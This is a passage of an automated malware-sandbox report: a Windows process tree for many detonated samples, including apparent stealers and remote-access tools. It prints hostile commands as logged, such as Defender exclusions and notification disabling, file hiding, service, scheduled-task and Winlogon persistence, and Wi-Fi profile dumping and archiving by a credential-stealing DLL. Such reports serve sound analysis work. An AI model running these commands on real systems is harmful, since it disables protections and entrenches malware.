    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f /reg:64
        5⤵
        
        PID:3792
    - - C:\Windows\system32\attrib.exe
        
        attrib +r +h +s \\.\C:\ProgramData\Nul
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:8716
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath @('C:\ProgramData', 'C:\Users\Admin\Desktop\a')
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8748
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c sc create "ServiceNul" binpath="C:\ProgramData\Nul\ServiceNul.exe" start="auto" & schtasks /create /f /sc onlogon /rl highest /tn "ServiceNul" /tr "C:\ProgramData\Nul\ServiceNul.exe" & reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\ProgramData\Nul\ServiceNul.exe," /f /reg:64 & dir "\\.\C:\ProgramData\Nul" /A /AH /AS /B
      4⤵
      PID:4448
    - - C:\Windows\system32\sc.exe
        
        sc create "ServiceNul" binpath="C:\ProgramData\Nul\ServiceNul.exe" start="auto"
        5⤵
        Launches sc.exe
        
        PID:8612
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "ServiceNul" /tr "C:\ProgramData\Nul\ServiceNul.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:6260
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\ProgramData\Nul\ServiceNul.exe," /f /reg:64
        5⤵
        
        PID:6428
- - C:\Users\Admin\Desktop\a\73.exe
    "C:\Users\Admin\Desktop\a\73.exe"
    3⤵
    PID:8988
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:7092
- - C:\Users\Admin\Desktop\a\142.exe
    "C:\Users\Admin\Desktop\a\142.exe"
    3⤵
    PID:5124
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:8136
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:6332
- - C:\Users\Admin\Desktop\a\libcef.sfx.exe
    "C:\Users\Admin\Desktop\a\libcef.sfx.exe"
    3⤵
    PID:8292
  - - C:\Users\Public\Documents\libcef.exe
      "C:\Users\Public\Documents\libcef.exe"
      4⤵
      PID:6484
- - C:\Users\Admin\Desktop\a\svcyr.exe
    "C:\Users\Admin\Desktop\a\svcyr.exe"
    3⤵
    PID:8968
- C:\Users\Admin\Desktop\Files\TJeAjWEEeH.exe
  "C:\Users\Admin\Desktop\Files\TJeAjWEEeH.exe"
  2⤵
  - Executes dropped EXE
  PID:3520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5400
- C:\Users\Admin\Desktop\Files\svcyr.exe
  "C:\Users\Admin\Desktop\Files\svcyr.exe"
  2⤵
  - Executes dropped EXE
  PID:3356
- C:\Users\Admin\Desktop\Files\procexp64.exe
  "C:\Users\Admin\Desktop\Files\procexp64.exe"
  2⤵
  - Drops file in Drivers directory
  - Sets service image path in registry
  - Executes dropped EXE
  - Enumerates connected drives
  - Checks system information in the registry
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: LoadsDriver
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5132
- C:\Users\Admin\Desktop\Files\crypted.exe
  "C:\Users\Admin\Desktop\Files\crypted.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:1140
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1784
- C:\Users\Admin\Desktop\Files\Client-built.exe
  "C:\Users\Admin\Desktop\Files\Client-built.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3148
- C:\Windows\SysWOW64\systray.exe
  "C:\Windows\SysWOW64\systray.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  PID:5572
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\Desktop\a\html.exe"
    3⤵
    PID:5268
- C:\Users\Admin\Desktop\4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:6044
- - C:\Users\Admin\Desktop\Files\dControl.exe
    "C:\Users\Admin\Desktop\Files\dControl.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1028
  - - C:\Users\Admin\Desktop\Files\dControl.exe
      C:\Users\Admin\Desktop\Files\dControl.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5388
    - - C:\Users\Admin\Desktop\Files\dControl.exe
        
        "C:\Users\Admin\Desktop\Files\dControl.exe" /TI
        5⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:956
- - C:\Users\Admin\Desktop\Files\cp.exe
    "C:\Users\Admin\Desktop\Files\cp.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:1844
- - C:\Users\Admin\Desktop\Files\net.exe
    "C:\Users\Admin\Desktop\Files\net.exe"
    3⤵
    - Executes dropped EXE
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
      "C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
      4⤵
      PID:6224
    - - C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
        5⤵
        
        PID:7144
  - - C:\Users\Admin\Desktop\Files\net.exe
      "C:\Users\Admin\Desktop\Files\net.exe"
      4⤵
      PID:6400
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6400 -s 508
        5⤵
        Program crash
        
        PID:7140
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6400 -s 528
        5⤵
        Program crash
        
        PID:8500
- - C:\Users\Admin\Desktop\Files\140.exe
    "C:\Users\Admin\Desktop\Files\140.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    PID:3320
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:4316
- - C:\Users\Admin\Desktop\Files\pei.exe
    "C:\Users\Admin\Desktop\Files\pei.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5544
  - - C:\Users\Admin\AppData\Local\Temp\1980732757.exe
      C:\Users\Admin\AppData\Local\Temp\1980732757.exe
      4⤵
      PID:3692
    - - C:\Windows\sysbrapsvc.exe
        
        C:\Windows\sysbrapsvc.exe
        5⤵
        
        PID:2244
      - C:\Users\Admin\AppData\Local\Temp\2580326245.exe
        
        C:\Users\Admin\AppData\Local\Temp\2580326245.exe
        6⤵
        
        PID:3256
      - C:\Users\Admin\AppData\Local\Temp\207819490.exe
        
        C:\Users\Admin\AppData\Local\Temp\207819490.exe
        6⤵
        
        PID:7720
        
        C:\Users\Admin\AppData\Local\Temp\1482313387.exe
        
        C:\Users\Admin\AppData\Local\Temp\1482313387.exe
        7⤵
        
        PID:3216
        
        C:\Users\Admin\AppData\Local\Temp\2449410714.exe
        
        C:\Users\Admin\AppData\Local\Temp\2449410714.exe
        7⤵
        
        PID:9192
        
        C:\Users\Admin\AppData\Local\Temp\1749621061.exe
        
        C:\Users\Admin\AppData\Local\Temp\1749621061.exe
        7⤵
        
        PID:1896
      - C:\Users\Admin\AppData\Local\Temp\2772024698.exe
        
        C:\Users\Admin\AppData\Local\Temp\2772024698.exe
        6⤵
        
        PID:6004
      - C:\Users\Admin\AppData\Local\Temp\474319789.exe
        
        C:\Users\Admin\AppData\Local\Temp\474319789.exe
        6⤵
        
        PID:6520
- - C:\Users\Admin\Desktop\Files\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\Files\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]"
    3⤵
    - Executes dropped EXE
    PID:1700
- - C:\Users\Admin\Desktop\Files\html.exe
    "C:\Users\Admin\Desktop\Files\html.exe"
    3⤵
    PID:3792
  - - C:\Users\Admin\Desktop\Files\html.exe
      "C:\Users\Admin\Desktop\Files\html.exe"
      4⤵
      PID:6556
  - - C:\Users\Admin\Desktop\Files\html.exe
      "C:\Users\Admin\Desktop\Files\html.exe"
      4⤵
      PID:6424
  - - C:\Users\Admin\Desktop\Files\html.exe
      "C:\Users\Admin\Desktop\Files\html.exe"
      4⤵
      PID:6552
- - C:\Users\Admin\Desktop\Files\eee01.exe
    "C:\Users\Admin\Desktop\Files\eee01.exe"
    3⤵
    PID:5484
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5484 -s 644
      4⤵
      Program crash
      PID:7940
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5484 -s 640
      4⤵
      Program crash
      PID:1236
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5484 -s 728
      4⤵
      Program crash
      PID:7052
- - C:\Users\Admin\Desktop\Files\Opolis.exe
    "C:\Users\Admin\Desktop\Files\Opolis.exe"
    3⤵
    PID:2100
  - - C:\Users\Admin\Desktop\Files\OSM-Client.exe
      "C:\Users\Admin\Desktop\Files\OSM-Client.exe"
      4⤵
      PID:6148
- - C:\Users\Admin\Desktop\Files\asdfg.exe
    "C:\Users\Admin\Desktop\Files\asdfg.exe"
    3⤵
    PID:4504
  - - C:\Users\Admin\Desktop\Files\asdfg.exe
      "C:\Users\Admin\Desktop\Files\asdfg.exe"
      4⤵
      PID:7680
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 368
        5⤵
        Program crash
        
        PID:8164
- - C:\Users\Admin\Desktop\Files\hjv.exe
    "C:\Users\Admin\Desktop\Files\hjv.exe"
    3⤵
    PID:4372
  - - C:\Users\Admin\Desktop\Files\hjv.exe
      "C:\Users\Admin\Desktop\Files\hjv.exe"
      4⤵
      PID:5052
- - C:\Users\Admin\Desktop\Files\zxcvb.exe
    "C:\Users\Admin\Desktop\Files\zxcvb.exe"
    3⤵
    PID:6364
  - - C:\Users\Admin\Desktop\Files\zxcvb.exe
      "C:\Users\Admin\Desktop\Files\zxcvb.exe"
      4⤵
      PID:7000
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7000 -s 468
        5⤵
        Program crash
        
        PID:8000
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7000 -s 472
        5⤵
        Program crash
        
        PID:6232
- - C:\Users\Admin\Desktop\Files\amadka.exe
    "C:\Users\Admin\Desktop\Files\amadka.exe"
    3⤵
    PID:7348
- - C:\Users\Admin\Desktop\Files\Document.exe
    "C:\Users\Admin\Desktop\Files\Document.exe"
    3⤵
    PID:8944
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\Files\Document.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6728
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7248
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1895.tmp"
      4⤵
      Creates scheduled task(s)
      PID:1236
  - - C:\Users\Admin\Desktop\Files\Document.exe
      "C:\Users\Admin\Desktop\Files\Document.exe"
      4⤵
      PID:9204
  - - C:\Users\Admin\Desktop\Files\Document.exe
      "C:\Users\Admin\Desktop\Files\Document.exe"
      4⤵
      PID:7712
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"' & exit
        5⤵
        
        PID:8648
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:7860
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7DC8.tmp.bat""
        5⤵
        
        PID:7188
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:6152
      - C:\Users\Admin\AppData\Roaming\msdtc.exe
        
        "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        6⤵
        
        PID:9080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4328
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp651.tmp"
        7⤵
        Creates scheduled task(s)
        
        PID:8008
        
        C:\Users\Admin\AppData\Roaming\msdtc.exe
        
        "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        7⤵
        
        PID:6804
        
        C:\Users\Admin\AppData\Roaming\msdtc.exe
        
        "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        7⤵
        
        PID:8084
        
        C:\Users\Admin\AppData\Roaming\msdtc.exe
        
        "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        7⤵
        
        PID:7388
- - C:\Users\Admin\Desktop\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
    "C:\Users\Admin\Desktop\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
    3⤵
    PID:8476
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8476 -s 548
      4⤵
      Program crash
      PID:756
- - C:\Users\Admin\Desktop\Files\Windows.exe
    "C:\Users\Admin\Desktop\Files\Windows.exe"
    3⤵
    PID:8080
- - C:\Users\Admin\Desktop\Files\inte.exe
    "C:\Users\Admin\Desktop\Files\inte.exe"
    3⤵
    PID:8584
- - C:\Users\Admin\Desktop\Files\maza-0.16.3-win32-setup-unsigned.exe
    "C:\Users\Admin\Desktop\Files\maza-0.16.3-win32-setup-unsigned.exe"
    3⤵
    PID:6324
- - C:\Users\Admin\Desktop\Files\hack1226.exe
    "C:\Users\Admin\Desktop\Files\hack1226.exe"
    3⤵
    PID:5224
- - C:\Users\Admin\Desktop\Files\LPE_ALL.exe
    "C:\Users\Admin\Desktop\Files\LPE_ALL.exe"
    3⤵
    PID:8552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c pause
      4⤵
      PID:7636
- - C:\Users\Admin\Desktop\Files\cock.exe
    "C:\Users\Admin\Desktop\Files\cock.exe"
    3⤵
    PID:6644
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:208
- - C:\Users\Admin\Desktop\Files\hv.exe
    "C:\Users\Admin\Desktop\Files\hv.exe"
    3⤵
    PID:2288
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      4⤵
      PID:8904
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Remove-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists';New-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists' -Value '"C:\Users\Admin\AppData\Local\LibraryApp_for_translators_and_linguists\LibraryApp_for_translators_and_linguists.exe"' -PropertyType 'String'
      4⤵
      PID:6700
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 1156
      4⤵
      Program crash
      PID:7368
- - C:\Users\Admin\Desktop\Files\xplugmanzx.exe
    "C:\Users\Admin\Desktop\Files\xplugmanzx.exe"
    3⤵
    PID:5364
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\Files\xplugmanzx.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7268
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\XEWKUH.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7332
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XEWKUH" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC763.tmp"
      4⤵
      Creates scheduled task(s)
      PID:6992
  - - C:\Users\Admin\Desktop\Files\xplugmanzx.exe
      "C:\Users\Admin\Desktop\Files\xplugmanzx.exe"
      4⤵
      PID:6544
- - C:\Users\Admin\Desktop\Files\task.exe
    "C:\Users\Admin\Desktop\Files\task.exe"
    3⤵
    PID:6216
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 764
      4⤵
      Program crash
      PID:8468
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 832
      4⤵
      Program crash
      PID:8100
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 784
      4⤵
      Program crash
      PID:7240
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 792
      4⤵
      Program crash
      PID:3644
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 948
      4⤵
      Program crash
      PID:9008
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 944
      4⤵
      Program crash
      PID:7440
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 1136
      4⤵
      Program crash
      PID:8972
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 1152
      4⤵
      Program crash
      PID:8992
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 1152
      4⤵
      Program crash
      PID:3108
  - - C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
      "C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"
      4⤵
      PID:2676
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 560
        5⤵
        Program crash
        
        PID:7588
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 568
        5⤵
        Program crash
        
        PID:8080
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 596
        5⤵
        Program crash
        
        PID:3636
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 832
        5⤵
        Program crash
        
        PID:8064
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 832
        5⤵
        Program crash
        
        PID:4676
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 916
        5⤵
        Program crash
        
        PID:5736
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 916
        5⤵
        Program crash
        
        PID:4956
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 952
        5⤵
        Program crash
        
        PID:5396
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 916
        5⤵
        Program crash
        
        PID:8760
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 1104
        5⤵
        Program crash
        
        PID:7856
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 1148
        5⤵
        Program crash
        
        PID:8920
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 1424
        5⤵
        Program crash
        
        PID:7464
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 1548
        5⤵
        Program crash
        
        PID:6536
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
        5⤵
        
        PID:9060
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
        6⤵
        
        PID:8648
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:4800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\906287020291_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7692
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main
        5⤵
        
        PID:8372
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 1376
        5⤵
        Program crash
        
        PID:6336
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 1548
        5⤵
        Program crash
        
        PID:8048
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 1564
        5⤵
        Program crash
        
        PID:3348
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 840
      4⤵
      Program crash
      PID:8700
- - C:\Users\Admin\Desktop\Files\Pilgzi.exe
    "C:\Users\Admin\Desktop\Files\Pilgzi.exe"
    3⤵
    PID:7780
- - C:\Users\Admin\Desktop\Files\Tweeter%20Traffic.exe
    "C:\Users\Admin\Desktop\Files\Tweeter%20Traffic.exe"
    3⤵
    PID:5348
- - C:\Users\Admin\Desktop\Files\hjv.exe
    "C:\Users\Admin\Desktop\Files\hjv.exe"
    3⤵
    PID:6844
  - - C:\Users\Admin\Desktop\Files\hjv.exe
      "C:\Users\Admin\Desktop\Files\hjv.exe"
      4⤵
      PID:7828
- - C:\Users\Admin\Desktop\Files\native.exe
    "C:\Users\Admin\Desktop\Files\native.exe"
    3⤵
    PID:7248
  - - C:\Users\Admin\Desktop\Files\native.exe
      "C:\Users\Admin\Desktop\Files\native.exe"
      4⤵
      PID:4132
- - C:\Users\Admin\Desktop\Files\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\Desktop\Files\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:7876
- - C:\Users\Admin\Desktop\Files\npp.exe
    "C:\Users\Admin\Desktop\Files\npp.exe"
    3⤵
    PID:8792
  - - C:\Users\Admin\AppData\Local\Temp\1210528188.exe
      C:\Users\Admin\AppData\Local\Temp\1210528188.exe
      4⤵
      PID:3740
- - C:\Users\Admin\Desktop\Files\ama.exe
    "C:\Users\Admin\Desktop\Files\ama.exe"
    3⤵
    PID:2060
- - C:\Users\Admin\Desktop\Files\v2.exe
    "C:\Users\Admin\Desktop\Files\v2.exe"
    3⤵
    PID:8472
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      4⤵
      PID:1296
- - C:\Users\Admin\Desktop\Files\SuburbansKamacite.exe
    "C:\Users\Admin\Desktop\Files\SuburbansKamacite.exe"
    3⤵
    PID:8676
- - C:\Users\Admin\Desktop\Files\LummaC2.exe
    "C:\Users\Admin\Desktop\Files\LummaC2.exe"
    3⤵
    PID:6808
- - C:\Users\Admin\Desktop\Files\ngrok.exe
    "C:\Users\Admin\Desktop\Files\ngrok.exe"
    3⤵
    PID:3276
- - C:\Users\Admin\Desktop\Files\DCRatBuild.exe
    "C:\Users\Admin\Desktop\Files\DCRatBuild.exe"
    3⤵
    PID:8616
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\PortproviderwinMonitorSvc\mfKYow52WThs6WxYPgYy8SvlAX398RVKTuVkRNatbU.vbe"
      4⤵
      PID:4600
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\PortproviderwinMonitorSvc\vcwCtM23VtO7vZcBlCg44jyJmSVgI43HgFP0J6KvnQO3IbLY.bat" "
        5⤵
        
        PID:5364
      - C:\PortproviderwinMonitorSvc\ContainerserverFontSavessession.exe
        
        "C:\PortproviderwinMonitorSvc/ContainerserverFontSavessession.exe"
        6⤵
        
        PID:8352
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jJPznEkbdT.bat"
        7⤵
        
        PID:7964
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:6068
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        Runs ping.exe
        
        PID:4884
- - C:\Users\Admin\Desktop\Files\jeditor.exe
    "C:\Users\Admin\Desktop\Files\jeditor.exe"
    3⤵
    PID:9168
- - C:\Users\Admin\Desktop\Files\288c47bbc1871b439df19ff4df68f00076.exe
    "C:\Users\Admin\Desktop\Files\288c47bbc1871b439df19ff4df68f00076.exe"
    3⤵
    PID:7512
  - - C:\Users\Admin\AppData\Local\Temp\ISetup4.exe
      "C:\Users\Admin\AppData\Local\Temp\ISetup4.exe"
      4⤵
      PID:6516
    - - C:\Windows\SysWOW64\WerFault.exe
        
